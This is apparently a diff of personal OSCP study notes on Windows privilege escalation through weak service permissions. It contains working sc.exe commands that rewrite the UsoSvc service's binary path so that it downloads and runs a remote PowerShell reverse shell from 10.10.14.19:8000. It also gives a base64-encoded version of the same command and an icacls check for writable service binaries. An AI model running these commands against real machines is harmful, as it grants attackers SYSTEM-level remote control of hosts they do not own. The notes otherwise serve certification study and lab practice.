grandMa5ter/Cyber-Sec-Notes/offensive/OSCP Mother of All Notes.md

              `powershell -ExecutionPolicy ByPass -command "& { .
 C:\Users\public\PowerShellRunAs.ps1; }"`

 - Windows Service Configuration Viewer - Check for misconfigurations in services that can lead to privilege escalation.
 You can replace the executable with your own and have windows execute whatever code you want as the privileged user.
-    icacls scsiaccess.exe
+    `icacls scsiaccess.exe`

+      ```text
       scsiaccess.exe
       NT AUTHORITY\SYSTEM:(I)(F)
       BUILTIN\Administrators:(I)(F)
       BUILTIN\Users:(I)(RX)
       APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
       Everyone:(I)(F)
+      ```

+  - If for example, service `UsoSvc` is having **AllAccess, Start** set, you can change the binary path to execute what we want:
+    - First stop the service via
+        `sc.exe stop UsoSvc`
+    - Second, change the binary path of the service via the command. _In this case, my reverse shell was of nishang and would autoexecute within powershell to create a reverse shell_!
+        `sc.exe config UsoSvc binpath="powershell.exe 'IEX( IWR http://10.10.14.19:8000/rev.ps1 -UseBasicParsing)'"`
+    - Last, start the service:
+        `sc.exe start UsoSvc`

+      **If this method doesn't work, change the command to base64 little endian sometimes it works!**
+      `echo "IEX( IWR http://10.10.14.19:8000/rev.ps1 -UseBasicParsing)" | iconv -t utf-16le|base64 -w 0`
+      `sc.exe config UsoSvc binpath="powershell.exe -EncodedCommand SQBFAFgAKAAgAEkAVwBSACAAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgAxADkAOgA4ADAAMAAwAC8AcgBlAHYALgBwAHMAMQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAKAA=="`
+      Or
+      `sc.exe config UsoSvc binpath="cmd.exe /c powershell.exe -EncodedCommand SQBFAFgAKAAgAEkAVwBSACAAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgAxADkAOgA4ADAAMAAwAC8AcgBlAHYALgBwAHMAMQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAKAA=="`

 - Compile a custom add user command in windows using C